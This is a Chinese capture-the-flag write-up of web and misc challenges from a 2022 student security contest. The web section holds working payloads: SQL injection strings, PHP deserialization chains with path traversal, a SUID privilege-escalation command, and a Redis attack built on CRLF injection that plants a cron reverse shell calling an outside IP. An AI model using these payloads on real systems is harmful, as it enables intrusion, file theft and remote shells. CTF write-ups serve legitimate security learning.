2022年江西省赣育杯网络安全大赛学生组Web&Misc Writeup
文章目录
- WEB
-
- 签到
- easyzphp
- ezpop
- ezpy
- MISC
-
- byteMuisc
- 有趣的PDF
题目链接:https://pan.baidu.com/s/1sCv3forZGOV5Wvsspya7HA
提取码:eyyy
WEB
签到
?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5--+
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='SQL01'),3,4,5--+
?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3,4,5--+
?id=-1'union select 1,(select flag from SQL01.users),3,4,5--+
easyzphp
include 'pop.php'; // Next step in pop.php
if (preg_match('/pop\.php\/*$/i', $_SERVER['PHP_SELF']))
{
exit("no way!");
}
if (isset($_GET['source']))
{
$path = basename($_SERVER['PHP_SELF']);
if (!preg_match('/pop.php$/', $path) && !preg_match('/index.php$/', $path))
{
exit("nonono!");
}
highlight_file($path);
exit();
}
?>
<a href="index.php?source">Source</a>
$_SERVER['PHP_SELF']:https://www.php.net/manual/zh/reserved.variables.server.phpbasename():https://www.php.net/manual/zh/function.basename.php
造成这里的绕过主要是因为basename()在Linux下,如果取得的文件名开头是非ASCII码范围的字符,则basename()会抛弃这个文件名,继续往上一层走,把上一层的文件名取出来,直到获取到正常可显示ASCII字符开头的文件名(Windows下直接获取)。
payload:/index.php/pop.php/%80?source
读取到pop.php的源码
error_reporting(1);
class SSRF
{
public $f;
public $hint;
public function __invoke()
{
if (filter_var($this->hint, FILTER_VALIDATE_URL)) {
$r = parse_url($this->hint);
if (!empty($this->f)) {
if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {
@include($this->f . '.php');//something in hint.php
} else {
die("try again!");
}
if (preg_match('/prankhub$/', $r['host'])) {
@$out = file_get_contents($this->hint);
echo $out;
} else {
die("error");
}
} else {
die("try it!");
}
} else {
die("Invalid URL");
}
}
}
class Abandon
{
public $test;
public $pop;
public function __construct()
{
$this->test = "";
$this->pop = "";
}
public function __toString()
{
return $this->pop['object']->test;
}
public function __wakeup()
{
if (preg_match("/flag/i", $this->test)) {
echo "hacker";
$this->test = "index.php";
}
}
}
class Route
{
public $point;
public function __construct()
{
$this->point = array();
}
public function __get($key)
{
$function = $this->point;
return $function();
}
}
if (isset($_POST['object'])) {
unserialize($_POST['object']);
}
$this->hint只需要是一个有效的URL,且parse_url($this->hint)['host']==/prankhub$/
PS C:\Users\Administrator\Downloads> php -r "var_dump(parse_url(filter_var('mochu7://prankhub/', FILTER_VALIDATE_URL))['host']);"
Command line code:1:
string(8) "prankhub"
Abandon::__construct() -> Abandon::__wakeup() -> Abandon::__toString() -> Route::__get() -> SSRF::__invoke()
poc
class SSRF
{
public $f;
public $hint;
}
class Abandon
{
public $test;
public $pop;
}
class Route
{
public $point;
}
$abandon = new Abandon();
$abandon->test = new Abandon();
$route = new Route();
$route->point = new SSRF();
$route->point->f = 'trypass';
$route->point->hint = 'mochu7://prankhub/../../../../../../../etc/passwd';
$abandon->test->pop = array("object" => $route);
echo serialize($abandon);
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:49:"mochu7://prankhub/../../../../../../../etc/passwd";}}}}s:3:"pop";N;}
读hint.php
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:60:"mochu7://prankhub/../../../../../../../var/www/html/hint.php";}}}}s:3:"pop";N;}
读flag
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:57:"mochu7://prankhub/../../../../../../../f1111444449999.txt";}}}}s:3:"pop";N;}
ezpop
look.php
error_reporting(0);
if ($_GET['file']){
$filename = $_GET['file'];
if ($filename=='hint.php'){
echo "come hacker!!!!!!!!!!!!";
}else{
ini_set('open_basedir','./');
if ($filename==''){
echo 'filename nononono!';
} else{
if(preg_match('/read|[\x00-\x2c]| |flag|\.\.|\.\//i', $filename)){
echo "hacker";
}else{
include($filename);
}
}
}
}else{
highlight_file(__FILE__);
}
限制活目录为当前目录,伪协议读index.php
/look.php?file=php://filter/convert.base64-encode/resource=index.php
index.php
include "class.php";
include "waf.php";
$username = $_POST['username'];
$password = $_POST['password'];
if ($username!=null&&$password!=null){
$serData = checkclass(checkData(waf(serialize(new Login($username,$password)))));
$login = unserialize($serData);
$loginStatus = $login->checkStatus();
if ($loginStatus){
echo "hello admin,flag在根目录下哦";
}
}
echo "Hint!!!";
?>
发现还另外包含了两个文件在当前目录,继续读出来
class.php
error_reporting(0);
class Login{
protected $user_name;
protected $pass_word;
protected $admin;
public function __construct($username,$password){
$this->user_name=$username;
$this->pass_word=$password;
if ($this->user_name=='admin'&&$this->pass_word=='123456'){
$this->admin = 1;
}else{
$this->admin = 0;
}
}
public function checkStatus(){
return $this->admin;
}
}
class register{
protected $username;
protected $password;
protected $mobile;
protected $mdPwd;
public function __construct($username,$password,$mobile,$mdPwd){
$this->username = $username;
$this->password = $password;
$this->mobile = $mobile;
$this->$mdPwd = $mdPwd;
}
public function __toString(){
return $this->mdPwd->pwd;
}
}
class magic{
protected $username = 'admin';
public function __get($key){
if ($this->username!=='admin'){
die("what do you do?");
}
$this->getFlag($key);
}
public function getFlag($key){
echo $key."";
eval($_POST[0]);
}
}
class PersonalFunction{
protected $username;
protected $password;
protected $func = array();
public function __construct($username, $password,$func){
$this->username = $username;
$this->password = $password;
$this->func = $func;
}
public function checkFunction(array $funcBars) {
$retData = null;
$personalProperties = array_flip([
'test', 'test',
'guest', 'guest',
]);
foreach ($personalProperties as $item => $num){
foreach ($funcBars as $funcBar => $stat) {
if (stristr($stat,$item)){
$retData = true;
}
}
}
return $retData;
}
public function doFunction($function){
return true;
}
public function __destruct(){
$retData = $this->checkFunction($this->func);
$this->doFunction($retData);
}
}
waf.php
function waf($data){
$data = str_replace('flag', "f", $data);
return $data;
}
function checkData($data){
if(stristr($data, 'username')!==False&&stristr($data, 'password')!==False){
die("hacker!!!\n");
}
else{
return $data;
}
}
function checkclass($data){
if (preg_match("/register|magic/",$data)){
die("hacker!!!!\n");
}
else{
return $data;
}
}
【CTF Show F5杯】Web逃离计划
完全原题,唯一改了的就是过滤替换的字符改了下,但是还是1个过滤关键字溢出3个位置。
payload直接用网上的,把等量的关键字替换为flag即可,然后传参代码执行。
username=flagflagflagflagflagflagflagflagflagflagflag&password=aaaa";S:12:"\00*\00pass_word";O:16:"personalFunction":3:{S:11:"\00*\00\75\73ername";S:4:"atao";S:11:"\00*\00\70\61ssword";S:6:"123456";S:7:"\00*\00func";a:1:{i:0;O:8:"Register":4:{S:11:"\00*\00\75\73ername";S:4:"atao";S:11:"\00*\00\70\61ssword";S:6:"123456";S:9:"\00*\00mobile";S:1:"1";S:8:"\00*\00mdPwd";O:5:"Magic":1:{S:11:"\00*\00\75\73ername";S:5:"admin";}}}};s:5:"admin&0=phpinfo();
SUID提权
查找具有SUID权限的命令:find / -perm -u=s -type f 2>/dev/null
xxd可读:xxd /flaggggg
ezpy
扫出一个/source
得到源码
#!python
#!/usr/bin/env python3
import os
import urllib
import urllib.request
import urllib.error
import redis as redis
from flask import Flask, request, render_template
app = Flask(__name__)
redis_conn = redis.Redis(host='127.0.0.1', port=6379, password=os.getenv("P"), db=0)
@app.route("/getinfo")
def getinfo():
sitename = request.args.get("sitename")
sitename = redis_conn.get(sitename).decode()
if not sitename.startswith(('http','file')):
return "错误:不支持协议"
try:
return urllib.request.urlopen(sitename).read()
except Exception as e:
return "错误: " + str(e)
@app.route("/setinfo",methods=['POST'])
def setinfo():
username = request.form.get("sitename")
siteurl = request.form.get("siteurl")
if redis_conn.set(username,siteurl):
return "ok"
return "!!!"
@app.route("/")
def index():
return render_template("index.html")
@app.route("/sitelist")
def sitelist():
return render_template("sitelist.html",sitelist=redis_conn.keys())
@app.route("/source")
def source():
return open("/app/app.py","r").read()
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80,debug=False)
有本地的Redis,并且给出了密码是环境变量P的值,且siteurl利用file协议可任意文件读取
http://192.168.38.220:8044/setinfo
sitename=env&siteurl=file:///proc/self/environ
拿到Redis的认证密码,就可以做有密码认证的的Redis攻击
注意到这里使用的是Python 3.7,且使用了urllib模块,而Python 3.x-3.7.2版本中的urllib存在CRLF攻击
https://www.anquanke.com/post/id/240014#h2-8
那么这里就可以利用CRLF做有密码认证的Redis攻击,创建计划任务反弹Shell
https://www.modb.pro/db/65827
http://127.0.0.1:6379/ HTTP/1.1
auth 1bcc23dfc231aac
$8
flushall
*3
$3
set
$1
1
$66
*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"
*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
mochu7:
修改为自己的VPS注意Bulk Strings表示的长度,并且要注意闭合原来的HTTP请求。
from urllib.parse import *
payload = 'http://127.0.0.1:6379/ HTTP/1.1\r\nauth 1bcc23dfc231aac\r\n$8\r\nflushall\r\n*3\r\n$3\r\nset\r\n$1\r\n1\r\n$66\r\n\r\n\r\n*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"\r\n\r\n\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$16\r\n/var/spool/cron/\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$4\r\nroot\r\n*1\r\n$4\r\nsave\r\n\r\nmochu7:'
print(quote(payload))
利用Burp给/setinfo传入sitename、siteurl
然后等待反弹shell即可
MISC
byteMuisc
这题运气好抢了个一血
beep.png末尾发现密码
LSB提取数据
a=64E3,80*(128
https://www.reddit.com/r/bytebeat/comments/s0b0m0/i_made_the_coolest_music/
https://dollchan.net/bytebeat/index.html
很明显的瑞克摇
PS C:\Users\Administrator> php -r "echo md5('never_gonna_give_you_up');"
daa2c770480cf44a285cd9225de2d522
SangFor{daa2c770480cf44a285cd9225de2d522}
有趣的PDF
hint:
有趣的PDF 1、PDF结构: launchURL 2、js in PDF 3、2021在野漏洞的出题灵感
art.pdf中嵌套了一个pdf,有密码
foremost分离出一张图片
得到信息:part2: unicode
PDFStreamDumper发现第一部分密码:password:baseURL_
得到where.pdf的密码:baseURL_unicode
where.pdf的JS注释区有一段貌似加密的数据?
之后就不会了,hint提示说是2021在野漏洞,找了半天没啥进展
如果哪位师傅解了这题希望能一起交流下这题,我的联系方式见下方QQ名片。谢谢^_^